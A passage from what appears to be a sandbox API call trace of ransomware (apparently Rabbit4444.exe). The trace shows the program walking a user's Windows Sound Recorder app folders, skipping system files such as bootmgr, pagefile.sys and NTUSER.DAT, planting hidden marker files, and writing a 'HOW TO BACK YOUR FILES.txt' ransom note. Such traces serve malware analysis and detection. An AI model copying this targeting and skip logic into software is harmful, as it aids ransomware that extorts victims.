cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0063.063] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.063] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.063] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0063.063] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0063.063] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0063.063] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0063.063] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0063.063] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0063.063] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0063.063] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0063.063] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0063.063] lstrcpyW (in: lpString1=0x130ebe0, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0063.063] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122040 [0063.063] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbe) returned 0x11e388 [0063.063] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122048 | out: ListHead=0xf68b0, ListEntry=0x122048) returned 0x122248 [0063.063] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66968cc, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c1d2d3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x66968cc, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0063.063] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.063] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.063] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0063.064] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0063.064] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0063.064] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0063.064] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0063.064] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0063.064] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0063.064] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0063.064] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0063.064] lstrcpyW (in: lpString1=0x130ebe0, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0063.064] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fc0 [0063.064] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc2) returned 0x116450 [0063.064] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fc8 | out: ListHead=0xf68b0, ListEntry=0x121fc8) returned 0x122048 [0063.064] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66bcb41, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x7136507a, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x7136507a, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0063.064] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.064] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.064] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0063.064] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0063.064] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0063.064] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0063.064] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0063.064] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0063.064] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0063.064] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0063.064] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0063.064] lstrcpyW (in: lpString1=0x130ebe0, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0063.064] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122300 [0063.064] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xba) returned 0x123760 [0063.064] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122308 | out: ListHead=0xf68b0, ListEntry=0x122308) returned 0x121fc8 [0063.064] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9690fc23, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9690fc23, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9690fc23, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0063.064] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.064] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.065] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0063.065] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0063.065] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0063.065] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0063.065] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0063.065] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0063.065] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0063.065] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0063.065] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0063.065] lstrcpyW (in: lpString1=0x130ebe0, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0063.065] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220a0 [0063.065] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc4) returned 0x116ba0 [0063.065] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1220a8 | out: ListHead=0xf68b0, ListEntry=0x1220a8) returned 0x122308 [0063.065] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66bcb41, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c9c773, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x66bcb41, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0063.065] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.065] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.065] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0063.065] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0063.065] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0063.065] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0063.065] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0063.065] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0063.065] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0063.065] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0063.065] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0063.065] lstrcpyW (in: lpString1=0x130ebe0, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0063.065] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0063.065] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbc) returned 0x123828 [0063.065] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122128 | out: ListHead=0xf68b0, ListEntry=0x122128) returned 0x1220a8 [0063.065] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66bcb41, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c9c773, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x66bcb41, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0063.065] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0063.066] lstrcpyW (in: lpString1=0x130ebe0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.066] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.066] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0063.066] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.066] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.066] CloseHandle (hObject=0x2a0) returned 1 [0063.067] CloseHandle (hObject=0x298) returned 1 [0063.067] GetCurrentThreadId () returned 0xd98 [0063.067] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122128 [0063.067] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\TempState" [0063.067] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123828 | out: hHeap=0xe0000) returned 1 [0063.067] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 [0063.067] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\TempState" [0063.067] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\TempState\\" [0063.067] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" [0063.067] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.069] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.071] FlushFileBuffers (hFile=0x298) returned 1 [0063.072] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.073] CloseHandle (hObject=0x298) returned 1 [0063.073] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\TempState") returned 93 [0063.073] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.073] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66bcb41, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c9c773, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeeeabc54, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102990 [0063.073] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.073] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.073] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.073] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.074] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66bcb41, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c9c773, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeeeabc54, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.074] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.074] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.074] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.074] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.074] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.074] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeeeabc54, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeeeabc54, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeeeabc54, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.074] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.074] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.074] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeeeabc54, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeeeabc54, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeeeabc54, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.074] FindClose (in: hFindFile=0x102990 | out: hFindFile=0x102990) returned 1 [0063.074] lstrcpyW (in: lpString1=0x130ebf4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.074] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.074] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0063.074] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.075] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.075] CloseHandle (hObject=0x2a0) returned 1 [0063.075] CloseHandle (hObject=0x298) returned 1 [0063.075] GetCurrentThreadId () returned 0xd98 [0063.075] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1220a8 [0063.075] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\SystemAppData" [0063.075] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116ba0 | out: hHeap=0xe0000) returned 1 [0063.075] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220a0 | out: hHeap=0xe0000) returned 1 [0063.075] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\SystemAppData" [0063.075] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\SystemAppData\\" [0063.075] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0063.075] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.077] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.079] FlushFileBuffers (hFile=0x298) returned 1 [0063.081] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.081] CloseHandle (hObject=0x298) returned 1 [0063.082] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\SystemAppData") returned 97 [0063.082] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.082] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9690fc23, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9690fc23, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xeeeabc54, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1028d0 [0063.082] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.082] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.082] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.082] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.082] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9690fc23, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9690fc23, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xeeeabc54, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.082] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.082] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.082] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.082] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.082] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.082] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeeeabc54, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeeeabc54, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeeed1de8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.082] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.082] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.082] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeeeabc54, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeeeabc54, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeeed1de8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.083] FindClose (in: hFindFile=0x1028d0 | out: hFindFile=0x1028d0) returned 1 [0063.083] lstrcpyW (in: lpString1=0x130ebfc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.083] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.083] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0063.083] 